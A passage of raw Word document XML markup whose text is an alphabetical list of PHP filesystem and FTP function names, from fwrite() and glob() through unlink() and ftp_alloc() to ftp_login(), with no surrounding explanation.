                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fwrite()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14603E4A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>glob()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B424C2A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_dir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4970B256" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_executable()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0376673C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7063220A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_link()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261DD125" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>is_readable()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60ED477D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_uploaded_file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DC7874" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_writable()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A05BF26" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>is_writeable()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7982F9CE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lchgrp()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B64E58" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lchown()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE85F35" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>link()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59995AE8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>linkinfo()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B414A46" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lstat()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CB5105" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mkdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF014BF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>move_uploaded_file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71589463" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>parse_ini_file()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E419239" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>parse_ini_string()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64938313" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pathinfo()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A185F2D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pclose()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6407EAB5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>popen()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC405C9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>readfile()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611EB64D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>readlink()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72449058" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>realpath()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B628125" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>realpath_cache_get()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D0147FA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>realpath_cache_size()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55330C00" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rename()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22602F19" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rewind()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFB966A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rmdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C65385" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>set_file_buffer()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="777F0E8C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>stat()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605E0D2A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>symlink()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132BEB4A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tempnam()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EE1FFF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tmpfile()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484E3042" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>touch()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9E3DC6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>umask()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B4C10E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>unlink()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685EEDC1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_alloc()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD403BF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_cdup()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA068D1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_chdir()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E1D6C6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_chmod()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F909EC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FE9214" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_connect()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F36EB7E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_delete()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F545FE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_exec()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="748B1FF9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_fget()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185699A8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_fput()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D5181CB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_get()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AED38B0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_get_option()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A4A004" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ftp_login()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9B7865" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
